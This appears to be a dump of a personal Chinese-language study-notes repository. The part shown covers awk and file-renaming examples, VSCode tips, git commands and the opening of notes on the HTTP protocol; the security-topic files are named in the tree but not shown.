├── @attachment
    └── images
    │   ├── Integrated
    │       └── Linux
    │       │   └── awk_1662533872617.png
    │   ├── Security
    │       ├── Web安全
    │       │   └── 信息收集_1661733427720.png
    │       └── 安全工具
    │       │   └── BurpSuite_1660992463972.png
    │   └── banner
    │       ├── README.png
    │       └── shimahara.gif
├── Develop
    ├── Python
    │   └── Python 基础.md
    └── 编程资源.md
├── Integrated
    ├── FileFilter.md
    ├── VSCode.md
    ├── awk.md
    ├── git.md
    └── vim.md
├── Network
    ├── HTTP.md
    └── TCP&IP.md
├── README.md
└── Security
    ├── Web安全
        ├── XSS.md
        ├── 未授权访问.md
        └── 逻辑漏洞.md
    ├── 信息收集
        ├── 信息收集.md
        └── 空间测绘.md
    ├── 安全工具
        ├── ExploitTools.md
        ├── ScanTools.md
        └── TrafficTools.md
    ├── 安全资源.md
    └── 漏洞赏金.md


/@attachment/images/Integrated/Linux/awk_1662533872617.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icekylin/Do1ng/fc89898a3b5ba92ce0bf3342de780cbac2bd6e76/@attachment/images/Integrated/Linux/awk_1662533872617.png


--------------------------------------------------------------------------------
/@attachment/images/Security/Web安全/信息收集_1661733427720.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icekylin/Do1ng/fc89898a3b5ba92ce0bf3342de780cbac2bd6e76/@attachment/images/Security/Web安全/信息收集_1661733427720.png


--------------------------------------------------------------------------------
/@attachment/images/Security/安全工具/BurpSuite_1660992463972.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icekylin/Do1ng/fc89898a3b5ba92ce0bf3342de780cbac2bd6e76/@attachment/images/Security/安全工具/BurpSuite_1660992463972.png


--------------------------------------------------------------------------------
/@attachment/images/banner/README.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icekylin/Do1ng/fc89898a3b5ba92ce0bf3342de780cbac2bd6e76/@attachment/images/banner/README.png


--------------------------------------------------------------------------------
/@attachment/images/banner/shimahara.gif:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/icekylin/Do1ng/fc89898a3b5ba92ce0bf3342de780cbac2bd6e76/@attachment/images/banner/shimahara.gif


--------------------------------------------------------------------------------
/Develop/编程资源.md:
--------------------------------------------------------------------------------
 1 | # 编程学习资源.md
 2 | 
 3 | - [编程学习资源.md](#编程学习资源md)
 4 |   - [Python](#python)
 5 |   - [Golang](#golang)
 6 |   - [Javascript](#javascript)
 7 | 
 8 | ---
 9 | 
10 | ## Python
11 | 
12 | - **学习路线**
13 |   - Python 学习路线: <https://github.com/liyupi/code-roadmap/blob/main/docs/roadmap/Python%E5%AD%A6%E4%B9%A0%E8%B7%AF%E7%BA%BF.md>
14 | - **相关文档**
15 |   - Python 中文在线手册: <https://docs.pythontab.com/>
16 | - **基础入门**
17 |   - 廖雪峰 Python: <https://www.liaoxuefeng.com/wiki/1016959663602400>
18 |   - 菜鸟教程 Python: <https://www.runoob.com/python3/python3-tutorial.html>
19 |   - W3school: <https://www.w3schools.cn/python/>
20 | - **进阶学习**
21 |   - "流畅的Python":
22 |   - "Python Cookbook 中文版，第 3 版":
23 | 
24 | ## Golang
25 | 
26 | - **学习路线**
27 |   - Go 学习路线: <https://tobebetterjavaer.com/xuexiluxian/go.html>
28 | - **相关文档**
29 |   - 官方中文文档: <https://go-zh.org/doc/>
30 | - **基础入门**
31 |   - Go 语言之旅: <https://tour.go-zh.org/welcome/>
32 | - **进阶学习**
33 |   - Go 语言圣经: <https://gopl-zh.github.io/index.html>
34 | 
35 | ## Javascript
36 | 
37 | - **学习路线**
38 |   - 前端学习路线: <https://github.com/liyupi/code-roadmap/blob/main/docs/roadmap/%E5%89%8D%E7%AB%AF%E5%AD%A6%E4%B9%A0%E8%B7%AF%E7%BA%BF.md>
39 | - **基础入门**
40 |   - 廖雪峰 JavaScriot 教程: <https://www.liaoxuefeng.com/wiki/1022910821149312>
41 |   - 菜鸟教程 JavaScript: <https://www.runoob.com/js/js-tutorial.html>
42 | 


--------------------------------------------------------------------------------
/Integrated/FileFilter.md:
--------------------------------------------------------------------------------
  1 | - [基础命令](#基础命令)
  2 | - [正则表达式](#正则表达式)
  3 |   - [取根域名-1](#取根域名-1)
  4 | - [文件批处理](#文件批处理)
  5 |   - [删除指定字符串](#删除指定字符串)
  6 |   - [替换指定字符串](#替换指定字符串)
  7 |   - [添加前缀](#添加前缀)
  8 |   - [添加后缀](#添加后缀)
  9 |   - [去重合并](#去重合并)
 10 | 
 11 | ## 基础命令
 12 | 
 13 | - 设置系统时间 `tzselect`
 14 | 
 15 | ## 正则表达式
 16 | 
 17 | ### 取根域名-1
 18 | 
 19 | ```
 20 | cat result.txt
 21 |   http://www.adomain.com/index.html
 22 |   http://www.bdomain.com/example.html
 23 |   http://www.cdomain.com/urls/123
 24 | 
 25 | awk -F '/' '{print $3}' result.txt > domain.txt
 26 | cat domain.txt
 27 |   www.adomain.com
 28 |   www.bdomain.com
 29 |   www.cdomain.com
 30 | 
 31 | awk -F 'www.' '{print $2}' domain.txt > rootdomain.txt
 32 | cat rootdomain.txt
 33 |   adomain.com
 34 |   bdomain.com
 35 |   cdomain.com
 36 | ```
 37 | 
 38 | ## 文件批处理
 39 | 
 40 | - 相关链接：
 41 |   - [rename命令详解](https://wangchujiang.com/linux-command/c/rename.html)
 42 |   - [Mac 批量重命名（增加前缀后缀）](https://blog.csdn.net/m0_46728513/article/details/114396779)
 43 | 
 44 | ### 删除指定字符串
 45 | 
 46 | ```bash
 47 | $ ls
 48 |   a_1.txt a_2.txt a_3.txt a_4.txt a_5.txt
 49 | $ rename -d a_ *.txt
 50 | $ ls
 51 |   1.txt 2.txt 3.txt 4.txt 5.txt
 52 | ```
 53 | 
 54 | ### 替换指定字符串
 55 | 
 56 | ```bash
 57 | ls
 58 |   1.txt 2.txt 3.txt 4.txt 5.txt
 59 | 
 60 | rename 's/.txt/.log/' *
 61 | ls
 62 |   1.log 2.log 3.log 4.log 5.log
 63 | ```
 64 | 
 65 | ### 添加前缀
 66 | 
 67 | ```bash
 68 | ls
 69 |   1.txt 2.txt 3.txt 4.txt 5.txt
 70 | 
 71 | for i in *.txt;do mv "$i" "username_${i%.txt}.txt" ;done
 72 | ls
 73 |   username_1.txt username_2.txt username_3.txt username_4.txt username_5.txt
 74 | ```
 75 | 
 76 | ### 添加后缀
 77 | 
 78 | ```bash
 79 | ls
 80 |   1.txt 2.txt 3.txt 4.txt 5.txt
 81 | 
 82 | for i in *.txt;do mv "$i" "${i%.txt}_bak.txt" ;done
 83 | ls
 84 |   1_bak.txt 2_bak.txt 3_bak.txt 4_bak.txt 5_bak.txt
 85 | ```
 86 | 
 87 | ### 去重合并
 88 | 
 89 | ```bash
 90 | ls
 91 |   1.txt 2.txt
 92 | cat 1.txt
 93 |   3
 94 |   2
 95 |   1
 96 | cat 2.txt
 97 |   2
 98 |   3
 99 |   4
100 | cat *.txt|sort|uniq
101 |   1
102 |   2
103 |   3
104 |   4
105 | ```
106 | 


--------------------------------------------------------------------------------
/Integrated/VSCode.md:
--------------------------------------------------------------------------------
 1 | - [常用快捷键](#常用快捷键)
 2 | - [个性化配置](#个性化配置)
 3 | - [实用拓展](#实用拓展)
 4 | - [Example](#example)
 5 |   - [连字支持](#连字支持)
 6 | 
 7 | ## 常用快捷键
 8 | 
 9 | - VSCode 集成快捷键
10 |   - 键盘快捷键：Ctrl+K Ctrl+S
11 |   - 切换窗口：Ctrl+数字键
12 |   - 切换编辑器组：Ctrl+数字键
13 |   - 顶部显示大纲：Command+Shift+O
14 |   - 多行编辑: Option + Command + 方向键
15 |   - 移动当前行: Option + 上下
16 |   - 在 Finder 中打开文件 Command + K R
17 | - Markdown
18 |   - 打开侧边预览：CMD+K V
19 |   - 打开预览：Shift+CMD+V
20 | - Markdown Image
21 |   - 粘贴图片：Shift+Opt+V -> Opt+V
22 | - breadcrumbs
23 |   - 打开并聚焦在 面包屑的选择上：Shift+CMD+.
24 |   - 打开面包屑（不展开子项目）：Shift+CMD+;
25 | 
26 | ## 个性化配置
27 | 
28 | Debug pane嵌入：`debug.toolBarLocation: "docked"`
29 | 
30 | ## 实用拓展
31 | 
32 | Markdown:
33 | 
34 | - [Markdown All in One](https://marketplace.visualstudio.com/items?itemName=yzhang.markdown-all-in-one)
35 | 
36 | 图片操作
37 | 
38 | - [Markdown Image](https://marketplace.visualstudio.com/items?itemName=hancel.markdown-image)
39 | 
40 | 表格格式化
41 | 
42 | - [Markdown Table](https://marketplace.visualstudio.com/items?itemName=TakumiI.markdowntable)
43 | 
44 | Markdown格式Tree
45 | 
46 | - [File Tree to Text Generator](https://marketplace.visualstudio.com/items?itemName=d-koppenhagen.file-tree-to-text-generator)
47 | 
48 | 所见即所得
49 | 
50 | ## Example
51 | 
52 | ### 连字支持
53 | 
54 | 1. 安装字体：<https://github.com/tonsky/FiraCode>
55 | 2. 设置字体为：Fira Code
56 | 3. 配置文件新增："editor.fontLigatures": true
57 | 


--------------------------------------------------------------------------------
/Integrated/awk.md:
--------------------------------------------------------------------------------
  1 | - [基本用法](#基本用法)
  2 | - [运算符](#运算符)
  3 | - [内建变量](#内建变量)
  4 | - [使用正则，字符串匹配](#使用正则字符串匹配)
  5 | - [忽略大小写](#忽略大小写)
  6 | - [模式取反](#模式取反)
  7 | - [awk脚本](#awk脚本)
  8 | - [另外一些实例](#另外一些实例)
  9 | 
 10 | > AWK 是一种处理文本文件的语言，是一个强大的文本分析工具。  
 11 | >
 12 | > 之所以叫 AWK 是因为其取了三位创始人 Alfred Aho，Peter Weinberger, 和 Brian Kernighan 的 Family Name 的首字符。
 13 | 
 14 | **相关链接**
 15 | - [Linux awk 命令 | 菜鸟教程](https://www.runoob.com/linux/linux-comm-awk.html)
 16 | 
 17 | ---
 18 | 
 19 | **语法**
 20 | 
 21 | ```
 22 | awk [选项参数] 'script' var=value file(s)
 23 | 或
 24 | awk [选项参数] -f scriptfile var=value file(s)
 25 | ```
 26 | 
 27 | 选项参数说明：
 28 | 
 29 | - -F fs or --field-separator fs
 30 | 指定输入文件折分隔符，fs是一个字符串或者是一个正则表达式，如-F:。
 31 | - -v var=value or --asign var=value
 32 | 赋值一个用户定义变量。
 33 | - -f scripfile or --file scriptfile
 34 | 从脚本文件中读取awk命令。
 35 | - -mf nnn and -mr nnn
 36 | 对nnn值设置内在限制，-mf选项限制分配给nnn的最大块数目；-mr选项限制记录的最大数目。这两个功能是Bell实验室版awk的扩展功能，在标准awk中不适用。
 37 | - -W compact or --compat, -W traditional or --traditional
 38 | 在兼容模式下运行awk。所以gawk的行为和标准的awk完全一样，所有的awk扩展都被忽略。
 39 | - -W copyleft or --copyleft, -W copyright or --copyright
 40 | 打印简短的版权信息。
 41 | - -W help or --help, -W usage or --usage
 42 | 打印全部awk选项和每个选项的简短说明。
 43 | - -W lint or --lint
 44 | 打印不能向传统unix平台移植的结构的警告。
 45 | - -W lint-old or --lint-old
 46 | 打印关于不能向传统unix平台移植的结构的警告。
 47 | - -W posix
 48 | 打开兼容模式。但有以下限制，不识别：/x、函数关键字、func、换码序列以及当fs是一个空格时，将新行作为一个域分隔符；操作符**和**=不能代替^和^=；fflush无效。
 49 | - -W re-interval or --re-inerval
 50 | 允许间隔正则表达式的使用，参考(grep中的Posix字符类)，如括号表达式[[:alpha:]]。
 51 | - -W source program-text or --source program-text
 52 | 使用program-text作为源代码，可与-f命令混用。
 53 | - -W version or --version
 54 | 打印bug报告信息的版本。
 55 | 
 56 | ## 基本用法
 57 | 
 58 | log.txt 内容如下
 59 | 
 60 | ```
 61 | 2 this is a test
 62 | 3 Do you like awk
 63 | This's a test
 64 | 10 There are orange,apple,mongo
 65 | ```
 66 | 
 67 | 用法一：
 68 | 
 69 | ```bash
 70 | # 默认按空格或TAB分割，输出文本中1、4项
 71 | awk '{print $1,$4}' log.txt
 72 | ----------------------------
 73 | 2 a
 74 | 3 like
 75 | This's 
 76 | 10 orange,apple,mongo
 77 | ```
 78 | 
 79 | 用法二：
 80 | 
 81 | ```bash
 82 | # 使用 awk 内置变量使用 , 分割
 83 | awk -F, '{print $1,$2}' log.txt
 84 | ----------------------------
 85 | 2 this is a test 
 86 | 3 Do you like awk 
 87 | This 's a test 
 88 | 10 There are orange apple
 89 | 
 90 | # 或者使用内建变量
 91 | awk 'BEGIN{FS=","} {print $1,$2}' log.txt
 92 | ----------------------------
 93 | 2 this is a test 
 94 | 3 Do you like awk 
 95 | This's a test 
 96 | 10 There are orange apple
 97 | 
 98 | # 使用多个分隔符.先使用空格分割，然后对分割结果再使用","分割
 99 | awk -F '[ ,]' '{print $1,$2,$5}' log.txt
100 | ----------------------------
101 | 2 this test
102 | 3 Do awk
103 | This's a 
104 | 10 There apple
105 | ```
106 | 
107 | 用法三：
108 | 
109 | ```bash
110 | # 定义变量
111 | awk -v a=1 '{print $1,$1+a}' log.txt
112 | ----------------------------
113 | 2 3
114 | 3 4
115 | This's 1
116 | 10 11
117 | ```
118 | 
119 | 用法四：
120 | 
121 | ```bash
122 | # 使用脚本规则
123 | awk -f cal.awk log.txt
124 | ```
125 | 
126 | ## 运算符
127 | 
128 | ![图 1](/@attachment/images/Integrated/Linux/awk_1662533872617.png)  
129 | 
130 | 输出第一列大于 2 行的行
131 | 
132 | ```bash
133 | awk '$1>2' log.txt
134 | ----------------------------
135 | 3 Do you like awk
136 | This's a test
137 | 10 There are orange,apple,mongo
138 | ```
139 | 
140 | 输出第一列等于 2 的行
141 | 
142 | ```bash
143 | awk '$1==2' log.txt
144 | ----------------------------
145 | 2 this is a test
146 | # 联合输出语句输出第 1，3 位的内容
147 | awk '$1==2 {print $1,$3}' log.txt
148 | ----------------------------
149 | 2 is
150 | ```
151 | 
152 | 输出第一列大于 2 且第三列等于 "are" 的行
153 | 
154 | ```bash
155 | awk '$1>2 && $3=="are"' log.txt
156 | ----------------------------
157 | 10 There are orange,apple,mongo
158 | # 联合输出语句第 1，2，3 位内容
159 | awk '$1>2 && $3=="are" {print $1,$2,$3}' log.txt
160 | ----------------------------
161 | 10 There are
162 | ```
163 | 
164 | ## 内建变量
165 | 
166 | | 变量      | 描述                                            |
167 | | ----------- | ------------------------------------------------- |
168 | | $n          | 当前记录的第n个字段，字段间由FS分隔 |
169 | | $0          | 完整的输入记录                             |
170 | | ARGC        | 命令行参数的数目                          |
171 | | ARGIND      | 命令行中当前文件的位置(从0开始算)  |
172 | | ARGV        | 包含命令行参数的数组                    |
173 | | CONVFMT     | 数字转换格式(默认值为%.6g)ENVIRON环境变量关联数组 |
174 | | ERRNO       | 最后一个系统错误的描述                 |
175 | | FIELDWIDTHS | 字段宽度列表(用空格键分隔)            |
176 | | FILENAME    | 当前文件名                                   |
177 | | FNR         | 各文件分别计数的行号                    |
178 | | FS          | 字段分隔符(默认是任何空格)            |
179 | | IGNORECASE  | 如果为真，则进行忽略大小写的匹配  |
180 | | NF          | 一条记录的字段的数目                    |
181 | | NR          | 已经读出的记录数，就是行号，从1开始 |
182 | | OFMT        | 数字的输出格式(默认值是%.6g)           |
183 | | OFS         | 输出字段分隔符，默认值与输入字段分隔符一致。 |
184 | | ORS         | 输出记录分隔符(默认值是一个换行符) |
185 | | RLENGTH     | 由match函数所匹配的字符串的长度      |
186 | | RS          | 记录分隔符(默认是一个换行符)         |
187 | | RSTART      | 由match函数所匹配的字符串的第一个位置 |
188 | | SUBSEP      | 数组下标分隔符(默认值是/034)           |
189 | 
190 | ```bash
191 | awk 'BEGIN{printf "%4s %4s %4s","FILENAME","FS\n","----------------\n"} {printf "%4s %4s\n",FILENAME,NF}' log.txt
192 | ----------------------------
193 | FILENAME  FS
194 |  ----------------
195 | log.txt    5
196 | log.txt    5
197 | log.txt    3
198 | log.txt    4
199 | # 输出顺序号 NR, 匹配文本行号
200 | awk '{print NR,FNR,$1,$2,$3}' log.txt
201 | ----------------------------
202 | 1 1 2 this is
203 | 2 2 3 Are you
204 | 3 3 This's a test
205 | 4 4 10 There are
206 | # 指定输出分隔符 $
207 | awk '{print $1,$2,$3}' OFS=" $ " log.txt
208 | ----------------------------
209 | 2 $ this $ is
210 | 3 $ Are $ you
211 | This's $ a $ test
212 | 10 $ There $ are
213 | ```
214 | 
215 | ## 使用正则，字符串匹配
216 | 
217 | ```bash
218 | # 输出第二列包含 "th"，并打印第二列与第四列
219 | awk '$2 ~ /th/ {print $2,$4}' log.txt
220 | ----------------------------
221 | this a
222 | ```
223 | 
224 | ~ 表示模式开始。// 中是模式。
225 | 
226 | ```bash
227 | # 输出包含 "re" 的行
228 | awk '/re/' log.txt
229 | ----------------------------
230 | 3 Are you like awk
231 | 10 There are orange,apple,mongo
232 | ```
233 | 
234 | ## 忽略大小写
235 | 
236 | ```bash
237 | # MacOS 下测试无效
238 | awk 'BEGIN{IGNORECASE=1} /this/' log.txt
239 | ----------------------------
240 | 2 this is a test
241 | This's a test
242 | ```
243 | 
244 | ## 模式取反
245 | 
246 | ```bash
247 | # 输出第二列不包含 th 的行，并打 2，4 列
248 | awk '$2 !~ /th/ {print $2,$4}' log.txt
249 | ----------------------------
250 | Are like
251 | a
252 | There orange,apple,mongo
253 | # 输出不包含 th 的行，并打 2，4 列
254 | awk '!/th/ {print $2,$4}' log.txt
255 | Are like
256 | a
257 | There orange,apple,mongo
258 | ```
259 | 
260 | ## awk脚本
261 | 
262 | - BEGIN{执行前的语句}
263 | - {处理每一行时要执行的语句}
264 | - END {处理完所有的行后要执行的语句}
265 | 
266 | score.txt 文件如下
267 | 
268 | ```
269 | Marry   2143 78 84 77
270 | Jack    2321 66 78 45
271 | Tom     2122 48 77 71
272 | Mike    2537 87 97 95
273 | Bob     2415 40 57 62
274 | ```
275 | 
276 | cal.awk 脚本如下：
277 | 
278 | ```bash
279 | #!/bin/awk -f
280 | #运行前
281 | BEGIN {
282 |     math = 0
283 |     english = 0
284 |     computer = 0
285 |  
286 |     printf "NAME    NO.   MATH  ENGLISH  COMPUTER   TOTAL\n"
287 |     printf "---------------------------------------------\n"
288 | }
289 | #运行中
290 | {
291 |     math+=$3
292 |     english+=$4
293 |     computer+=$5
294 |     printf "%-6s %-6s %4d %8d %8d %8d\n", $1, $2, $3,$4,$5, $3+$4+$5
295 | }
296 | #运行后
297 | END {
298 |     printf "---------------------------------------------\n"
299 |     printf "  TOTAL:%10d %8d %8d \n", math, english, computer
300 |     printf "AVERAGE:%10.2f %8.2f %8.2f\n", math/NR, english/NR, computer/NR
301 | }
302 | ```
303 | 
304 | 执行效果
305 | 
306 | ```bash
307 | awk -f cal.awk score.txt
308 | NAME    NO.   MATH  ENGLISH  COMPUTER   TOTAL
309 | ---------------------------------------------
310 | Marry  2143     78       84       77      239
311 | Jack   2321     66       78       45      189
312 | Tom    2122     48       77       71      196
313 | Mike   2537     87       97       95      279
314 | Bob    2415     40       57       62      159
315 | ---------------------------------------------
316 |   TOTAL:       319      393      350
317 | AVERAGE:     63.80    78.60    70.00
318 | ```
319 | 
320 | ## 另外一些实例
321 | 
322 | AWK 的 Hello World
323 | 
324 | ```bash
325 | BEGIN { print "Hello, world!" }
326 | ```
327 | 
328 | 计算文件大小
329 | 
330 | ```bash
331 | ls -l *.txt | awk '{sum+=$5} END {print sum}'
332 | ```
333 | 
334 | 从文件中找出长度大于 80 的行：
335 | 
336 | ```bash
337 | awk 'length>80' log.txt
338 | ```
339 | 
340 | 打印九九乘法表
341 | 
342 | ```bash
343 | seq 9 | sed 'H;g' | awk -v RS='' '{for(i=1;i<=NF;i++)printf("%dx%d=%d%s", i, NR, i*NR, i==NR?"\n":"\t")}'
344 | ```


--------------------------------------------------------------------------------
/Integrated/git.md:
--------------------------------------------------------------------------------
 1 | - [Basic](#basic)
 2 | - [Repo](#repo)
 3 | - [Pull](#pull)
 4 | - [Push](#push)
 5 | 
 6 | ---
 7 | 
 8 | ## Basic
 9 | 
10 | ```bash
11 | # 生成公钥与github连接
12 | ssh-keygen
13 | cat ~/.ssh/id_rsa.pub   # Github 新建 SSH keys 填入这里的内容
14 | git config --global user.name "your_username"
15 | git config --global user.email "your_email"
16 | git config --list
17 | 
18 | # 建立仓库提示命令
19 | echo "# Cyber-Security-Notes" >> README.md
20 | git init
21 | git add README.md
22 | git commit -m "first commit"
23 | git branch -M main
24 | git remote add origin git@github.com:kyl1n0/Cyber-Security-Notes.git
25 | git push -u origin main
26 | ```
27 | 
28 | ## Repo
29 | 
30 | ```bash
31 | # 重新绑定仓库（主要用于修改仓库名称后）
32 | git remote rm origin
33 | git remote add origin git@github.com:moekylin/Do1ng.git
34 | ```
35 | 
36 | ## Pull
37 | 
38 | ```bash
39 | # 清除本地修改，拉取仓库最新内容
40 | # 当本地仓库修改了内容执行 `git pull` 时，会出现如下内容，可以通过两种方式拉取远程仓库内容
41 | error: Your local changes to the following files would be overwritten by merge:
42 |         README.md
43 | Please commit your changes or stash them before you merge.
44 | 
45 | ## 方式 1：stash 会把所有未提交的修改（包括暂存的和非暂存的）都保存起来，用于后续恢复当前工作目录。比如下面的中间状态，通过git stash命令推送一个新的储藏，当前的工作目录就干净了。
46 | git stash
47 | git pull
48 | git stash pop
49 | 
50 | ## 方式 2: --hard 参数撤销工作区中所有未提交的修改内容，将暂存区与工作区都回到上一次版本，并删除之前的所有信息提交：
51 | git reset --hard
52 | git pull
53 | ```
54 | 
55 | ## Push
56 | 
57 | ```bash
58 | # 撤销 (revert) 上一次 commit push
59 | git log # 找到上一次 commit 的编号
60 | git revert [commit编号] # 撤销上一次更改
61 | git push
62 | 
63 | # 回滚 commit 到某一节点（同时删除仓库commit）
64 | git log   # 找到想要回滚的 commit 编号
65 | git reset --hard commit_id  # HEAD 指向此次提交记录
66 | git push origin HEAD --force  # 强制 push
67 | 
68 | # 清除缓存重新提交数据 (用于更新.gitnore)
69 | git rm --cached -r .
70 | git add .
71 | git commit -m "$(date)" # 当前时间的 commit
72 | git push
73 | ```
74 | 


--------------------------------------------------------------------------------
/Integrated/vim.md:
--------------------------------------------------------------------------------
1 | 
2 | > 你想以最快的速度学习人类史上最好的文本编辑器VIM吗？你先得懂得如何在VIM幸存下来，然后一点一点地学习各种戏法。
3 | 
4 | **相关链接**
5 | - [简明 VIM 练级攻略](https://coolshell.cn/articles/5426.html)
6 | 


--------------------------------------------------------------------------------
/Network/HTTP.md:
--------------------------------------------------------------------------------
   1 | - [图解 HTTP 笔记](#图解-http-笔记)
   2 |   - [第一章 网络基础](#第一章-网络基础)
   3 |     - [1.1 网络基础 TCP/IP](#11-网络基础-tcpip)
   4 |     - [1.2 域名解析DNS服务](#12-域名解析dns服务)
   5 |     - [1.3 各个协议与 HTTP 协议关系](#13-各个协议与-http-协议关系)
   6 |   - [第二章 简单的 HTTP 协议](#第二章-简单的-http-协议)
   7 |     - [2.1 通过请求+响应的交换达到通信](#21-通过请求响应的交换达到通信)
   8 |     - [2.2 HTTP 是不保存状态的协议](#22-http-是不保存状态的协议)
   9 |     - [2.3 HTTP 请求方法](#23-http-请求方法)
  10 |     - [2.4 Cookie 的状态管理](#24-cookie-的状态管理)
  11 |   - [第三章 HTTP 报文信息](#第三章-http-报文信息)
  12 |     - [3.1 HTTP 报文](#31-http-报文)
  13 |     - [3.2 请求报文和响应报文](#32-请求报文和响应报文)
  14 |   - [第四章 HTTP 状态码](#第四章-http-状态码)
  15 |     - [4.1 状态码告知服务器返回的请求结果](#41-状态码告知服务器返回的请求结果)
  16 |     - [4.2 2XX 成功](#42-2xx-成功)
  17 |     - [4.3 3XX 重定向](#43-3xx-重定向)
  18 |     - [4.4 4XX 客户端错误](#44-4xx-客户端错误)
  19 |     - [4.5 5XX 服务器错误](#45-5xx-服务器错误)
  20 |   - [第五章 HTTP 首部](#第五章-http-首部)
  21 |     - [5.1 HTTP 报文首部](#51-http-报文首部)
  22 |     - [5.2 HTTP 首部字段](#52-http-首部字段)
  23 |     - [5.3 HTTP/1.1 通用首部字段](#53-http11-通用首部字段)
  24 |     - [5.4 请求首部字段](#54-请求首部字段)
  25 |     - [5.5 响应首部字段](#55-响应首部字段)
  26 |     - [5.6 实体首部字段](#56-实体首部字段)
  27 |     - [5.7 为 Cookie 服务的首部字段](#57-为-cookie-服务的首部字段)
  28 |   - [第六章 HTTPS 确保Web安全](#第六章-https-确保web安全)
  29 |     - [6.1 HTTP 的缺点](#61-http-的缺点)
  30 |     - [6.2 HTTP + 加密 + 认证 + 完整性保护 = HTTPS](#62-http--加密--认证--完整性保护--https)
  31 |   - [第七章 确认访问用户身份的认证](#第七章-确认访问用户身份的认证)
  32 |     - [7.1 BASIC 认证](#71-basic-认证)
  33 |     - [7.1 DIGEST 认证](#71-digest-认证)
  34 |     - [7.3 SSL 客户端认证](#73-ssl-客户端认证)
  35 |     - [7.4 基于表单认证](#74-基于表单认证)
  36 |   - [第八章 基于 HTTP 的功能追加协议](#第八章-基于-http-的功能追加协议)
  37 |     - [8.1 消除 HTTPS 瓶颈的 SPDY](#81-消除-https-瓶颈的-spdy)
  38 |     - [8.2 使用浏览器进行全双工通信的 WebSocket](#82-使用浏览器进行全双工通信的-websocket)
  39 |     - [8.3 期盼已久的 HTTP/2.0](#83-期盼已久的-http20)
  40 |     - [8.4 Web 服务器管理文件的 WebDAV](#84-web-服务器管理文件的-webdav)
  41 |   - [第九章 构建 Web 内容的技术](#第九章-构建-web-内容的技术)
  42 |     - [9.1 HTML](#91-html)
  43 |     - [9.2 动态 HTML](#92-动态-html)
  44 |     - [9.3 Web 应用](#93-web-应用)
  45 |     - [9.4 数据发布的格式及语言](#94-数据发布的格式及语言)
  46 |   - [第十章 Web 的攻击技术](#第十章-web-的攻击技术)
  47 |     - [10.1 针对 Web 的攻击技术](#101-针对-web-的攻击技术)
  48 |     - [10.2 因输出值转义不完全引发的安全漏洞](#102-因输出值转义不完全引发的安全漏洞)
  49 |     - [10.3 因设置或设计上的缺陷引发的安全漏洞 (大概率已过时)](#103-因设置或设计上的缺陷引发的安全漏洞-大概率已过时)
  50 |     - [10.4 因会话管理疏忽引发的安全漏洞](#104-因会话管理疏忽引发的安全漏洞)
  51 |     - [10.5 其他安全漏洞](#105-其他安全漏洞)
  52 | 
  53 | - **相关资源**
  54 |   - 书籍资源1: [Information_Security_Books/118http权威指南](https://github.com/olist213/Information_Security_Books/tree/main/118http%E6%9D%83%E5%A8%81%E6%8C%87%E5%8D%97)
  55 |   - 书籍资源2: [Information_Security_Books/054图解HTTP彩色版](https://github.com/olist213/Information_Security_Books/tree/main/054%E5%9B%BE%E8%A7%A3HTTP%E5%BD%A9%E8%89%B2%E7%89%88)
  56 |   - 精简版1: [http: 自己提炼的关于《HTTP权威指南》每章的知识点总结](https://github.com/woai30231/http)
  57 |   - 精简版2: [《图解HTTP与HTTPS》的干货1.2w字【绝对保值】 - 掘金](https://juejin.cn/post/6900511779869327373#heading-16)
  58 |   - [HTTP 开发者指南 HTTP | MDN](https://developer.mozilla.org/zh-CN/docs/Web/HTTP)
  59 | - **拓展阅读**
  60 |   - [5分钟快速梳理你的HTTP体系-阿里云开发者社区](https://developer.aliyun.com/article/790991)
  61 | 
  62 | # 图解 HTTP 笔记
  63 | 
  64 | ## 第一章 网络基础
  65 | 
  66 | > Web 使用的协议为 HTTP (HyperText Transfer Protocol, 超文本传输协议) 的协议作为规范, 完成从客户端到服务端等一系列运作流程，而协议是指规则的约定。也可以说Web是建立在HTTP协议上通信的。
  67 | 
  68 | ### 1.1 网络基础 TCP/IP
  69 | 
  70 | **1.1.1 TCP/IP协议族**
  71 | 
  72 | TCP/IP协议族按照层次分别分为以下4层：应用层、传输层、网络层和数据链路层。
  73 | 
  74 | **应用层**: TCP/IP 协议族内预存了各类通用的**应用服务**处于应用层
  75 | 
  76 | **传输层**: 有两个性质不同的协议 TCP 和 UDP, 传输层对上层应用层提供处于网络连接中的两台计算机之间的数据传输
  77 | 
  78 | **网络层**: 网络层用于处理在网络上流动的数据包。数据包是网络传输的最小数据单位。该层规定了通过怎样的路径到达对方计算机，并把数据包传给对方。与对方计算机之间通过多台计算机或网络设备进行传输时，网络层所起的作用就是在众多的选项内选择一条传输路线。
  79 | 
  80 | **链路层**: 用来处理连接网络的硬件部分。包括控制操作系统、硬件的设备驱动、NIC【网络适配器俗称网卡】及光纤等物理可见部分。硬件上的范畴均在链路层的作用范围之内。
  81 | 
  82 | **1.1.2 TCP/IP通信传输流**
  83 | 
  84 | 利用TCP/IP协议族进行网络通信时，会通过分层顺序与对方进行通信。发送端从应用层往下走，接收端从下层往上走。
  85 | 
  86 | 在传输层【TCP协议】把从应用层处接收到的数据【HTTP请求报文】进行分割，并在各个报文上打上标记序号及端口号后转发给网络层。
  87 | 
  88 | ### 1.2 域名解析DNS服务
  89 | 
  90 | DNS【Domain Nmae System】服务是和HTTP协议一样位于应用层协议。它提供域名到IP地址之间的解析服务。
  91 | 
  92 | ### 1.3 各个协议与 HTTP 协议关系
  93 | 
  94 | 通过下面一张图，看各个协议在HTTP协议通信中发挥的哪些作用？假设想浏览hackr.jp/xss/Web页面
  95 | 
  96 | ![[Pasted image 20220920084454.png]]
  97 | 
  98 | ## 第二章 简单的 HTTP 协议
  99 | 
 100 | > 本部分在主要讲述HTTP协议结构，主要使用的是HTTP/1.1
 101 | 
 102 | ### 2.1 通过请求+响应的交换达到通信
 103 | 
 104 | 看一个具体的例子
 105 | ```http
 106 | GET /index.htm HTTP/1.1
 107 | Host: hacker.jp
 108 | ```
 109 | 
 110 | 起始的 Get 表示请求访问服务器的类型, 称为 **方法**. 随后的字符串 /index.html 指明了请求访问的 **资源对象**. 最后的 HTTP/1.1 代表 **HTTP的版本号**, 用来提示客户端使用的 HTTP 协议功能. 请求内容的意思是: 请求访问某台 HTTP 服务器上的 /index.htm 页面的资源
 111 | 
